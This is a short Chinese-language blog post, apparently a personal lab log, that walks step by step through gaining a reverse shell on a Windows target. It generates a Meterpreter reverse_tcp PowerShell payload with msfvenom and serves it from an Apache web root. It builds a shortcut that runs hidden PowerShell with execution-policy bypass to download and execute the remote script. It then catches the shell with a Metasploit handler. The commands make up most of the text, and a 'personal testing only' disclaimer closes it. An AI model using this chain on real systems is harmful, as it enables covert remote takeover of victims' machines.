该漏洞以存在一段时间,由于能力问题一直未对该漏洞利用方式进行测试,今天学过程中记录一下测试流程。
- 确认系统是否存在该漏洞
- 使用msfvenom 生成反弹shell,shell生成方式如下:
确认生成文件msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1
生成反弹shell
- 将生成文件放到apache网站根目录
sudo cp test.ps1 /var/www/html/
复制完成
- 启用apache服务
服务启动sudo service apache2 start
启动服务后通过curl方式测试是否正常访问
- 在靶机上启用powershell链接
新建快捷方式 保存powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存为exe文件。
- 在攻击端监听反弹
metasploit做以下相关配置:
启动监听msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ...
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run
- 在被攻击端运行创建快捷键
- msf获取到远程shell
仅作自己测试,请勿违规使用。
网友评论